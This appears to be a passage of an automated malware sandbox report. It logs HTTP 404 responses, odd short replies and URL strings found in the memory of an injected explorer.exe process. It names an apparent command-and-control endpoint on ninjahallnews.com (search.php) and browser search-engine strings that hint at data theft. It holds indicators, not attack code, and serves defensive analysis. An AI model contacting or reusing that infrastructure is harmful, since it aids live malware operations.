    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2218524683.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2216870595.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2218534895.0000000007B60000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C36B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: explorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    Source: explorer.exe, 00000002.00000000.2222332214.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/I
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ninjahallnews.com/
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ninjahallnews.com//
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/earch.php;L
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.php
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpo
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
    Source: explorer.exe, 00000002.00000000.2222332214.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: unknown | Network traffic detected: HTTP traffic on port 61436 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61465 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61470
    Source: unknown | Network traffic detected: HTTP traffic on port 61451 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61449 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 61445 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61463
    Source: unknown | Network traffic detected: HTTP traffic on port 61441 -> 443
